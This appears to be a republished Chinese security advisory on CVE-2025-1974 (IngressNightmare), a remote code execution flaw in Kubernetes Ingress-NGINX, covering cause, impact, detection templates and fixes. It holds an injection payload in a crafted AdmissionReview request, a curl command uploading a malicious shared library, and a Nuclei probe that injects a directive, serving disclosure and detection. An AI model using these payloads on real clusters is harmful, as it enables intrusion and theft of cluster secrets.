IngressNightmare:Ingress-NGINX未授权RCE(CVE-2025-1974)

admin 2025年3月27日19:22:51评论16 views字数 7562阅读25分12秒阅读模式
IngressNightmare:Ingress-NGINX未授权RCE(CVE-2025-1974)

全文共计2807字,预计阅读14分钟

漏洞概述

CVE-2025-1974是Kubernetes Ingress-NGINX Controller的一个高危漏洞,允许攻击者在未授权情况下远程执行代码(RCE)。该漏洞由Wiz研究团队(Nir Ohfeld等)于2024年底发现,2025年3月公开披露,属于"IngressNightmare"系列漏洞之一。

技术背景

Ingress-NGINX Controller作用

Ingress-NGINX Controller是Kubernetes生态的核心项目之一,在GitHub上拥有18.1k+ Stars,他的主要作用是:

  • 作为集群流量入口网关,实现Ingress资源定义的流量路由规则

  • 通过NGINX实现反向代理和负载均衡功能

Ingress-NGINX Controller工作机制

Kubernetes Ingress Controller负责管理集群外部访问,但自身不执行路由。Ingress-Nginx Controller 使用 NGINX 实现 Ingress 规则,充当 Ingress 控制器,是 Kubernetes 文档中推荐的Ingress控制器。

graph TD    A[Ingress资源创建/更新] --> B[准入控制器验证]    B --> C{配置是否有效?}    C -->|有效| D[应用配置]    C -->|无效| E[拒绝请求]

漏洞技术细节

漏洞成因

漏洞存在于Ingress-NGINX Controller的配置验证阶段:

  1. 处理Ingress对象时构造NGINX配置

  2. 使用nginx -t命令验证配置有效性

  3. 关键缺陷:未对auth-url等注解值进行充分过滤

利用链分析

1.发现有漏洞的集群

kubectl get pods --all-namespaces --selector app.kubernetes.io/name=ingress-nginx

2.配置注入

攻击者会创建一个特制的 AdmissionReview 请求,其中包含带有恶意 auth-url 注释的 ingress 对象,示例:

{"kind""AdmissionReview","apiVersion""admission.k8s.io/v1","request": {"uid""d48aa397-c414-4fb2-a2b0-b28187daf8a5","kind": {"group""networking.k8s.io","version""v1","kind""Ingress"    },"resource": {"group""networking.k8s.io","version""v1","resource""ingresses"    },"requestKind": {"group""networking.k8s.io","version""v1","kind""Ingress"    },"requestResource": {"group""networking.k8s.io","version""v1","resource""ingresses"    },"name""test-ingressxaa","namespace""default","operation""CREATE","userInfo": {    },"object": {"kind""Ingress","apiVersion""networking.k8s.io/v1","metadata": {"name""test-ingressxaa","namespace""default","creationTimestamp": null,### 关键位置 ###"annotations": {"nginx.ingress.kubernetes.io/rewrite-target""/","nginx.ingress.kubernetes.io/auth-url""http://example.com#;}}}nssl_engine /path/to/shared-library.so;events {nserver { location /aa { #"        }      },"spec": {"ingressClassName""nginx","rules": [          {"host""test.local","http": {"paths": [              ]            }          }        ]      },"status": {"loadBalancer": {}      }    },"oldObject": null,"dryRun"true,"options": {"kind""CreateOptions","apiVersion""meta.k8s.io/v1"    }  }}

3.恶意库上传 利用NGINX的client body缓冲机制将恶意so文件写入磁盘:

curl -X POST http://ingress-nginx/data -T evil.so

4.代码执行ssl_engine指令加载恶意共享库触发RCE

影响范围

ingress-nginx版本:

  • < v1.11.0

  • v1.11.0 - 1.11.4

  • v1.12.0

检测方案

外部检测(Nuclei模板)

id: CVE-2025-1974info:  name: Ingress-Nginx Controller - Remote Code Execution  author: iamnoooob,rootxharsh,pdresearch  severity: critical  description: |    A security issue was discovered in ingress-nginx where the `auth-tls-match-cn` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller  impact: |    Vulnerable versions of Ingress-Nginx controller can be exploited to gain unauthorized access to all secrets across namespaces in the Kubernetes cluster, potentially leading to complete cluster takeover.  remediation: |    Update to one of the following versions: Version 1.12.1 or later / Version 1.11.5 or later  reference:    - https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities    - https://projectdiscovery.io/blog/ingressnightmare-unauth-rce-in-ingress-nginx    - https://nvd.nist.gov/vuln/detail/CVE-2025-1974  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H    cvss-score: 9.8    cwe-id: CWE-653    cve-id: CVE-2025-1974  metadata:    verified: true    max-request: 1    shodan-query: ssl:"ingress-nginx" port:8443  tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8shttp:  - raw:      - |        POST / HTTP/1.1        Host: {{Hostname}}        Content-Type: application/json        {"kind""AdmissionReview","apiVersion""admission.k8s.io/v1","request": {"uid""d48aa397-c414-4fb2-a2b0-b28187daf8a6","kind": {"group""networking.k8s.io","version""v1","kind""Ingress"            },"resource": {"group""networking.k8s.io","version""v1","resource""ingresses"            },"requestKind": {"group""networking.k8s.io","version""v1","kind""Ingress"            },"requestResource": {"group""networking.k8s.io","version""v1","resource""ingresses"            },"name""test-{{randstr}}","namespace""default","operation""CREATE","userInfo": {            },"object": {"kind""Ingress","apiVersion""networking.k8s.io/v1","metadata": {"name""test-{{randstr}}","namespace""default","creationTimestamp": null,"annotations": {"nginx.ingress.kubernetes.io/auth-url""http://example.com#;load_module test;n"                }              },"spec": {"ingressClassName""nginx","rules": [                  {"host""{{randstr}}","http": {"paths": [                      ]                    }                  }                ]              },"status": {"loadBalancer": {}              }            },"oldObject": null,"dryRun"true,"options": {"kind""CreateOptions","apiVersion""meta.k8s.io/v1"            }          }        }    matchers:      - type: word        part: body        words:          - 'AdmissionReview'          - 'directive is not allowed here'          - 'load_module'        condition: and

执行命令

nuclei -t CVE-2025-1974.yaml -u https://target:8443

集群内部检测

kubectl get pods -n ingress-nginx -l app.kubernetes.io/component=controller -o json | jq '.items[].spec.containers[] | select(.name=="controller") | .image'

版本检查逻辑

id: CVE-2025-1974-k8sinfo:  name: Ingress-Nginx Controller - Unauthenticated Remote Code Execution  author: princechaddha  severity: critical  description: A security issue was discovered in ingress-nginx where some Ingress annotations can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller  impact: |    Vulnerable versions of Ingress-Nginx controller can be exploited to gain unauthorized access to all secrets across namespaces in the Kubernetes cluster, potentially leading to complete cluster takeover.  remediation: |    Update to one of the following versions: Version 1.12.1 or later / Version 1.11.5 or later  reference:    - https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities    -   tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s,k8s-cluster-securityflow: |  code(1) ;for (let pod of template.items) {set("pod", pod)    javascript(1);  }self-contained: truecode:  - engine:      - sh      - bashsource: kubectl get pods -n ingress-nginx -l app.kubernetes.io/component=controller -o json    extractors:      - type: json        name: items        internal: true        json:          - '.items[]'javascript:  - code: |let podData = JSON.parse(template.pod);        const container = podData.spec.containers.find(c => c.name === 'controller');if (container && container.image) {          const imageTag = container.image.split(':')[1];if (imageTag) {            const version = imageTag.split('@')[0].replace(/^v/, '');            const [major, minor, patch] = version.split('.').map(v => parseInt(v, 10));if ((major === 1 && minor === 11 && patch < 5) ||                (major === 1 && minor === 12 && patch === 0) ||                (major === 1 && minor < 11) ||                (major === 1 && minor === 9 && patch <= 3)) {let result = (`Ingress-Nginx controller in namespace '${podData.metadata.namespace}' is running vulnerable version ${version}. Update to v1.12.1+ or v1.11.5+`);              Export(result);            }          }        }    extractors:      - type: dsl        dsl:          - response

修复建议

紧急措施

1. 升级到安全版本
kubectl set image deployment/ingress-nginx-controller   controller=k8s.gcr.io/ingress-nginx/controller:v1.12.1
2. 网络隔离
# NetworkPolicy示例apiVersion: networking.k8s.io/v1kind: NetworkPolicymetadata:  name: restrict-admissionspec:  podSelector:    matchLabels:      app.kubernetes.io/component: controller  ingress:  - from:    - namespaceSelector:        matchLabels:          kubernetes.io/metadata.name: kube-system    ports:    - protocol: TCP      port: 8443

长期加固

  • 启用mTLS认证准入控制器

  • 定期审计Ingress注解使用情况

  • 实施Pod安全策略限制挂载敏感目录

时间线

日期
事件
2024-12-31
Wiz向Kubernetes安全团队报告漏洞
2025-03-24
漏洞公开披露,发布补丁版本
2025-03-25
发布集群检测模板
2025-03-26
发布外部检测模板

总结

该漏洞利用链完整,攻击者可通过构造恶意Ingress对象实现容器逃逸,最终控制整个集群。建议所有使用Ingress-NGINX的用户立即进行漏洞排查和升级。

请关注SecLink安全空间获取我们最新的更新

欢迎加入SecLink安全空间企业微信探讨安全问题!

IngressNightmare:Ingress-NGINX未授权RCE(CVE-2025-1974)

原文始发于微信公众号(SecLink安全空间):IngressNightmare:Ingress-NGINX未授权RCE(CVE-2025-1974)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月27日19:22:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   IngressNightmare:Ingress-NGINX未授权RCE(CVE-2025-1974)https://cn-sec.com/archives/3890769.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息